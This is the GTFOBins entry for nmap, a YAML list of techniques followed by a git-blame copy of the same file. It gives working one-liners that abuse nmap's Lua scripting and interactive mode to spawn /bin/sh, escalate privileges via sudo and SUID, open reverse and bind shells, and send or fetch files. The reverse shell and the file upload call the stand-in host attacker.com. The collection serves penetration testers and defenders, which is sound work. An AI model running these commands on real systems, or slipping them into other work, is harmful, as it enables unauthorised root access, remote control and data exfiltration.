GTFOBins.github.io/_gtfobins/nmap.md

---
functions:
  shell:
    - description: Input echo is disabled.
      code: |
        TF=$(mktemp)
        echo 'os.execute("/bin/sh")' > $TF
        nmap --script=$TF
    - description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
      code: |
        nmap --interactive
        nmap> !sh
  non-interactive-reverse-shell:
    - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        TF=$(mktemp)
        echo 'local s=require("socket");
          local t=assert(s.tcp());
          t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
          while true do
            local r,x=t:receive();local f=assert(io.popen(r,"r"));
            local b=assert(f:read("*a"));t:send(b);
          end;
          f:close();t:close();' > $TF
        nmap --script=$TF
  non-interactive-bind-shell:
    - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
      code: |
        export LPORT=12345
        TF=$(mktemp)
        echo 'local k=require("socket");
          local s=assert(k.bind("*",os.getenv("LPORT")));
          local c=s:accept();
          while true do
            local r,x=c:receive();local f=assert(io.popen(r,"r"));
            local b=assert(f:read("*a"));c:send(b);
          end;c:close();f:close();' > $TF
        nmap --script=$TF
  file-upload:
    - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        export LFILE=file_to_send
        TF=$(mktemp)
        echo 'local f=io.open(os.getenv("LFILE"), 'rb')
          local d=f:read("*a")
          io.close(f);
          local s=require("socket");
          local t=assert(s.tcp());
          t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
          t:send(d);
          t:close();' > $TF
        nmap --script=$TF
  file-download:
    - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
        < "file_to_send"` on the attacker box to send the file.
      code: |
        export LPORT=12345
        export LFILE=file_to_save
        TF=$(mktemp)
        echo 'local k=require("socket");
          local s=assert(k.bind("*",os.getenv("LPORT")));
          local c=s:accept();
          local d,x=c:receive("*a");
          c:close();
          local f=io.open(os.getenv("LFILE"), "wb");
          f:write(d);
          io.close(f);' > $TF
        nmap --script=$TF
  file-write:
    - code: |
        TF=$(mktemp)
        echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
        nmap --script=$TF
  file-read:
    - code: |
        TF=$(mktemp)
        echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
        nmap --script=$TF
  sudo:
    - description: Input echo is disabled.
      code: |
        TF=$(mktemp)
        echo 'os.execute("/bin/sh")' > $TF
        sudo nmap --script=$TF
    - description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
      code: |
        sudo nmap --interactive
        nmap> !sh
  limited-suid:
    - description: Input echo is disabled.
      code: |
        TF=$(mktemp)
        echo 'os.execute("/bin/sh")' > $TF
        ./nmap --script=$TF
---
add new ways 2018-08-17 17:16:09 +02:00			`---`
			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`shell:`
Fix nmap descriptions 2018-08-23 17:57:26 +02:00			`- description: Input echo is disabled.`
Add suid, description and YAML fixes to nmap 2018-08-19 09:52:24 +02:00			`code: \|`
Fix nmap description and temporary file 2018-08-19 12:20:37 +02:00			`TF=$(mktemp)`
			`echo 'os.execute("/bin/sh")' > $TF`
			`nmap --script=$TF`
Add nmap interactive mode 2018-12-24 01:48:13 +01:00			`- description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.`
			`code: \|`
			`nmap --interactive`
			`nmap> !sh`
Adopt new function names 2018-10-05 19:55:38 +02:00			`non-interactive-reverse-shell:`
Add reverse and bind shell and file transfer functions to nmap 2018-08-23 19:29:50 +02:00			- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
			`TF=$(mktemp)`
			`echo 'local s=require("socket");`
			`local t=assert(s.tcp());`
			`t:connect(os.getenv("RHOST"),os.getenv("RPORT"));`
			`while true do`
			`local r,x=t:receive();local f=assert(io.popen(r,"r"));`
			`local b=assert(f:read("*a"));t:send(b);`
			`end;`
			`f:close();t:close();' > $TF`
			`nmap --script=$TF`
Adopt new function names 2018-10-05 19:55:38 +02:00			`non-interactive-bind-shell:`
Add reverse and bind shell and file transfer functions to nmap 2018-08-23 19:29:50 +02:00			- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
			`code: \|`
			`export LPORT=12345`
			`TF=$(mktemp)`
			`echo 'local k=require("socket");`
			`local s=assert(k.bind("*",os.getenv("LPORT")));`
			`local c=s:accept();`
			`while true do`
			`local r,x=c:receive();local f=assert(io.popen(r,"r"));`
			`local b=assert(f:read("*a"));c:send(b);`
			`end;c:close();f:close();' > $TF`
			`nmap --script=$TF`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-upload:`
Add reverse and bind shell and file transfer functions to nmap 2018-08-23 19:29:50 +02:00			- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
			`export LFILE=file_to_send`
			`TF=$(mktemp)`
			`echo 'local f=io.open(os.getenv("LFILE"), 'rb')`
			`local d=f:read("*a")`
			`io.close(f);`
			`local s=require("socket");`
			`local t=assert(s.tcp());`
			`t:connect(os.getenv("RHOST"),os.getenv("RPORT"));`
			`t:send(d);`
			`t:close();' > $TF`
			`nmap --script=$TF`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-download:`
Add reverse and bind shell and file transfer functions to nmap 2018-08-23 19:29:50 +02:00			- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
			< "file_to_send"` on the attacker box to send the file.
			`code: \|`
			`export LPORT=12345`
			`export LFILE=file_to_save`
			`TF=$(mktemp)`
			`echo 'local k=require("socket");`
			`local s=assert(k.bind("*",os.getenv("LPORT")));`
			`local c=s:accept();`
			`local d,x=c:receive("*a");`
			`c:close();`
			`local f=io.open(os.getenv("LFILE"), "wb");`
			`f:write(d);`
			`io.close(f);' > $TF`
			`nmap --script=$TF`
			`file-write:`
			`- code: \|`
			`TF=$(mktemp)`
			`echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF`
			`nmap --script=$TF`
			`file-read:`
			`- code: \|`
			`TF=$(mktemp)`
			`echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF`
			`nmap --script=$TF`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Fix nmap descriptions 2018-08-23 17:57:26 +02:00			`- description: Input echo is disabled.`
Add suid, description and YAML fixes to nmap 2018-08-19 09:52:24 +02:00			`code: \|`
Fix nmap description and temporary file 2018-08-19 12:20:37 +02:00			`TF=$(mktemp)`
			`echo 'os.execute("/bin/sh")' > $TF`
			`sudo nmap --script=$TF`
Add nmap interactive mode 2018-12-24 01:48:13 +01:00			`- description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.`
			`code: \|`
			`sudo nmap --interactive`
			`nmap> !sh`
Adopt new function names 2018-10-05 19:55:38 +02:00			`limited-suid:`
Fix nmap descriptions 2018-08-23 17:57:26 +02:00			`- description: Input echo is disabled.`
Add suid, description and YAML fixes to nmap 2018-08-19 09:52:24 +02:00			`code: \|`
Fix nmap description and temporary file 2018-08-19 12:20:37 +02:00			`TF=$(mktemp)`
Fix nmap suid-limited 2018-08-24 00:45:07 +02:00			`echo 'os.execute("/bin/sh")' > $TF`
Fix nmap description and temporary file 2018-08-19 12:20:37 +02:00			`./nmap --script=$TF`
add new ways 2018-08-17 17:16:09 +02:00			`---`